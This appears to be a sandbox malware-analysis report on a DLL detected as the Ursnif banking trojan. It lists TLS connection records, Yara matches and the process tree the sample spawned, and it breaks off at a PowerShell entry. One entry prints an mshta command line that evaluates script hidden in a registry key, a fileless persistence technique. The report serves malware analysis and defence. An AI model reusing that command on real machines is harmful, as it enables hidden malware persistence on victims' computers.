Jul 6, 2021 14:30:44.090290070 CEST	82.165.229.54	443	192.168.2.4	49864	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:44.091450930 CEST	82.165.229.54	443	192.168.2.4	49865	CN=*.ui-portal.de, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 27 02:00:00 CEST 2020 Mon Nov 06 13:23:45 CET 2017	Wed Jun 01 14:00:00 CEST 2022 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:30:44.091450930 CEST	82.165.229.54	443	192.168.2.4	49865	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:00.116266966 CEST	82.165.229.87	443	192.168.2.4	49870	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:00.116266966 CEST	82.165.229.87	443	192.168.2.4	49870	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:00.116369009 CEST	82.165.229.87	443	192.168.2.4	49871	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:00.116369009 CEST	82.165.229.87	443	192.168.2.4	49871	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:00.391014099 CEST	82.165.229.59	443	192.168.2.4	49872	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:00.391014099 CEST	82.165.229.59	443	192.168.2.4	49872	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:00.391526937 CEST	82.165.229.59	443	192.168.2.4	49873	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:00.391526937 CEST	82.165.229.59	443	192.168.2.4	49873	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:01.977792025 CEST	82.165.229.54	443	192.168.2.4	49874	CN=*.ui-portal.de, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 27 02:00:00 CEST 2020 Mon Nov 06 13:23:45 CET 2017	Wed Jun 01 14:00:00 CEST 2022 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:01.977792025 CEST	82.165.229.54	443	192.168.2.4	49874	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:01.987289906 CEST	82.165.229.54	443	192.168.2.4	49875	CN=*.ui-portal.de, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 27 02:00:00 CEST 2020 Mon Nov 06 13:23:45 CET 2017	Wed Jun 01 14:00:00 CEST 2022 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:01.987289906 CEST	82.165.229.54	443	192.168.2.4	49875	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:01.994576931 CEST	82.165.229.16	443	192.168.2.4	49876	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:01.994576931 CEST	82.165.229.16	443	192.168.2.4	49876	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:02.011965990 CEST	82.165.229.16	443	192.168.2.4	49877	CN=*.mail.com, O=1&1 Mail & Media GmbH, L=Montabaur, ST=Rheinland-Pfalz, C=DE CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Nov 10 01:00:00 CET 2020 Mon Nov 06 13:23:45 CET 2017	Mon Nov 15 00:59:59 CET 2021 Sat Nov 06 13:23:45 CET 2027	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:31:02.011965990 CEST	82.165.229.16	443	192.168.2.4	49877	CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 06 13:23:45 CET 2017	Sat Nov 06 13:23:45 CET 2027		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6560 Parent PID: 5980

General

Start time:	14:29:33
Start date:	06/07/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\2790000.dll'
Imagebase:	0x13c0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6592 Parent PID: 6560

General

Start time:	14:29:34
Start date:	06/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 6620 Parent PID: 6560

General

Start time:	14:29:34
Start date:	06/07/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\2790000.dll
Imagebase:	0x40000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6632 Parent PID: 6592

General

Start time:	14:29:34
Start date:	06/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Imagebase:	0x340000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6672 Parent PID: 6560

General

Start time:	14:29:35
Start date:	06/07/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff71bce0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6716 Parent PID: 6560

General

Start time:	14:29:35
Start date:	06/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\2790000.dll,DllRegisterServer
Imagebase:	0x340000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6760 Parent PID: 6672

General

Start time:	14:29:35
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6992 Parent PID: 6672

General

Start time:	14:29:59
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17426 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6840 Parent PID: 6672

General

Start time:	14:30:11
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17430 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4980 Parent PID: 6672

General

Start time:	14:30:16
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82966 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 1808 Parent PID: 6672

General

Start time:	14:30:23
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82970 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 684 Parent PID: 6672

General

Start time:	14:30:33
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82982 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 5504 Parent PID: 6672

General

Start time:	14:30:34
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17460 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 4864 Parent PID: 6672

General

Start time:	14:30:40
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 4984 Parent PID: 6672

General

Start time:	14:30:47
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17472 /prefetch:2
Imagebase:	0x7ff732050000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 1016 Parent PID: 6672

General

Start time:	14:30:50
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17480 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 4576 Parent PID: 6672

General

Start time:	14:30:57
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83036 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 6796 Parent PID: 6672

General

Start time:	14:30:59
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17500 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: mshta.exe PID: 5492 Parent PID: 3424

General

Start time:	14:31:00
Start date:	06/07/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Imagebase:	0x7ff687b80000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 5500 Parent PID: 6672

General

Start time:	14:31:03
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83052 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 5872 Parent PID: 5492

General

Start time:	14:31:04
Start date:	06/07/2021
